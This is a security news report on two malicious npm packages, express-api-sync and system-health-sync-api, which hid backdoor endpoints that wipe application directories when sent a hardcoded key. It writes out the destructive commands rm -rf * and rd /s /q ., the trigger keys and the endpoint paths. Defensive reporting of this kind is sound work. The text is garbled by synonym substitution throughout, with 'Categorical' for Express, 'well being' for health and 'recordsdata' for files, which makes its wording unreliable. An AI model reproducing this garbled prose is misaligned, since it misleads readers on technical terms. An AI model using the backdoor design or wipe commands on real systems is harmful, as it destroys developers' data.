Malicious npm packages posing as respectable utility utilities create damaging backdoor endpoints that allow distant deletion of app directories, Socket reported Thursday.The packages — express-api-sync and system-health-sync-api — had been printed by npm person botsailer on June 3, 2025, and have since been eliminated by npm attributable to malicious code.Categorical-api-sync presupposed to function a easy API for Categorical functions to sync information between two databases, however in actuality had no respectable perform.As an alternative, the middleware built-in by the package deal would register a malicious HTTP POST endpoint referred to as “/api/this/that” that may silently anticipate a “kill command” from the attacker, based on Socket.As soon as this backdoor endpoint acquired a POST request containing the hardcoded key “DEFAULT_123” by way of a header or physique parameter, the malware used the child_process.exec perform to execute the Unix deletion command rm -rf *, which deleted all recordsdata within the utility’s working listing.Whereas express-api-sync solely affected Categorical functions operating on Unix-like methods, system-health-sync-api was extra complicated and versatile, providing seemingly respectable capabilities alongside its hidden damaging options.The package deal had respectable dependencies, together with nodemailer and performance-now, and included a useful, benign well being verify endpoint that may return primary server standing data. The package deal additionally provided a number of configurations to customers, including to the air of legitimacy.Nonetheless, system-health-sync-api additionally created damaging backdoors — one major endpoint (POST /_/system/well being) and a backup (POST /_/sys/upkeep) in case the primary endpoint is blocked. Like with express-api-sync, these endpoints would set off deletion instructions after receiving a request from the attacker containing a selected key.The attackers used their e mail tackle, anupm019@gmail[.]com, as a communication channel to obtain notifications from the malware, together with any configuration updates made by the focused developer. Whereas the hardcoded default key for the “kill command” request was “HelloWorld,” the attacker might modify in case the important thing was modified by the sufferer.The package deal robotically detected the working system (Home windows or Unix-like) and framework (Categorical, Fastify or a local HTTP module) to tailor its actions to the goal utility. It used the rm -rf * deletion command for Unix and rd /s /q . on Home windows to wipe the applying’s recordsdata.The malware additionally gathered details about the goal system earlier than wiping recordsdata, together with host identify, IP tackle and environmental variables hash, the latter of which could possibly be used to create a “fingerprint” to “assist attackers determine servers with particular configurations or detect when surroundings variables change,” the Socket researchers acknowledged.Whereas these short-lived packages solely acquired about 300 downloads mixed through the time they had been obtainable, their discovery highlights threats builders ought to pay attention to when counting on npm utilities.In contrast to frequent npm assaults centered on cryptocurrency and credential theft, these packages threaten to sabotage and disrupt builders by their damaging capabilities.The Socket staff concluded that they count on to see extra assaults sooner or later concentrating on particular utility frameworks, akin to Categorical and Fastify, in addition to extra superior assaults involving potential reconnaissance of complete firm infrastructures. Moreover, the “kill switches” planted by these packages might lie dormant for months or years earlier than executing their damaging instructions, permitting for coordinated assaults.
